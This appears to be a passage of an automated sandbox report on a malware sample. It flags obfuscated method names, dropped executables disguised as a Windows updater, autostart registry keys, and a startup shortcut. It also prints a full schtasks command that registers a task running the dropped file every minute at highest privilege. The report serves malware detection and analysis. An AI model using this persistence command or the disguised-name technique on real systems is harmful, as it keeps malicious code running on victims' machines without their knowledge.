                            Source: 0.2.file.exe.372e50c.1.raw.unpack, ub7IeQ5sqWntl1qadx7oq8YPwaBWDRNX9iR60l23xp96M8SJ85dQZQ0Jlyoi3nwkDA9WIIBOt0Hb0HYwHI.csHigh entropy of concatenated method names: 'H2RSsZFKRrHRT65cfj1Xt86ijqMLzBbhqqyo9tS3BTuyFl36DNaS74BiNpx9RXeFVIr0gOFUpzoNkqevAK', 'm7jKQ9artMQi15JY', 'cC6KrzcON6oUu94C', 'xlFJfWFmLDceh0wF', 'IV62WVx1P90yMgcl'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.csHigh entropy of concatenated method names: 'ltdvSTmuDwBFxehfhJITmk7EjiC5LtSjvbgKwuUpdQh9Sh9IDPHrvBVnvmOmDjRI', 'OzPzG0vNO9oBkRBCfVLBP3EqlDUV3EoLZznjtrjt7nZtyUeWKNPez4kBqSY9ObiU', 'uodld5Psb4FuTMXQf6h7IUWD6PTMuS2Qc7TBCPiTqUieoTGTmRKHOPncvTJic8rB', 'u1WayCkYPUkQZgvoxrdU33C45lKbkZr044i1dl9TxVWnUpRCo1c2bpBZKyfTvxpa', 'uB0MHsnOyEIA2Wrc8yUc6BijIDBv6tPvlQ2YGbJaEJmL9jeiVkNss7RyTRwOoWB8', 'WLW7MpcGbsiFbXTpRmancjelVxRWkFNRZbTbYhbrRKoLsPlM5Yqi46CRoqhzZdSu', 'Kk1RT2LIUI7b6bfYb8aSFepH5gkeFIO4somhtQ50uLzx31p0mGX60fXO9yKICQp0', 'Vk2sUIA1bkvO8AhgrzBdwWMlWz0YBDwolSLiYjRWqygIAb3yH3X5DL36Xh2SynWC', 'XgdUNkMUXEXGC2TVTReadLd0ZlSGfqldf228i9ggBJH3QVbMB0ybcOg8h5B8q1pM', 'plvpD1pR7iBdqDimQRP5q9IEu8BUfF9RjWsg0JDOrhivlMC7fsfXUeR5JV6SuHGD'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, d46Zv2qYbaQJDMbZ7Xt1F2PnAlaWbc40N1LuG79B9IpFWHdOqXitnmSGc4QjuU9D7djj6HwceM2y3rralb.csHigh entropy of concatenated method names: 'W1SH7JjcsI8sTnwKEy5ILvF0kL2cI0ZyQY6ygglXZsU3AqHKHFLb5nTJMzn1opEmHsqhnssg8igxNeTjqV', 'Bc8aYFCKF5DlIWuz0WE9up88nhWMEFbsJWzwk8E1IbVfAFN3LVm6HRwfQBq1HyNFqog2785atf61STkiA4', 'sxCXhjmnGtAQ7QpCyXm6hPTO0WsFjg7RxaeRT87XPU9lJIBzdNXhy01KK7wlmU5GdENw8yZkuTKyBL8cpw', 'C24mPs6zaxpv5tbRh4agFza8K3WvAQU9CRVWmTlOYUKp4MTfUxlFze2YOxO4evCawHj5xbwv0sYz1F12w1', '_8aGks2WbjOcupJTr0kPmVoHQknH4VTxWv6BUfJhJ99GLXd7ytrXvFtow9Pnas76JTrSuArqfYQ', 'rLHAojLGqYxJ2rxj', '_0xB1uBLsDSIBpH4x', 'mXJA63SBxx6jb4pQ', '_32sqqCGc2QDZqDpG', 'nQSinV7QBHDbQCpk'
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\file.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\WindowsUpdaterConf.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\WindowsUpdaterConf.exeJump to dropped file

                            Boot Survival

                            barindex
                            Creates autostart registry keys with suspicious names
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 666999666Jump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 666999666Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConfJump to behavior
                            Drops PE files to the user root directory
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\WindowsUpdaterConf.exeJump to dropped file
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnkJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdaterConf.lnkJump to behavior
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 666999666Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 666999666Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConfJump to behavior
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdaterConfJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
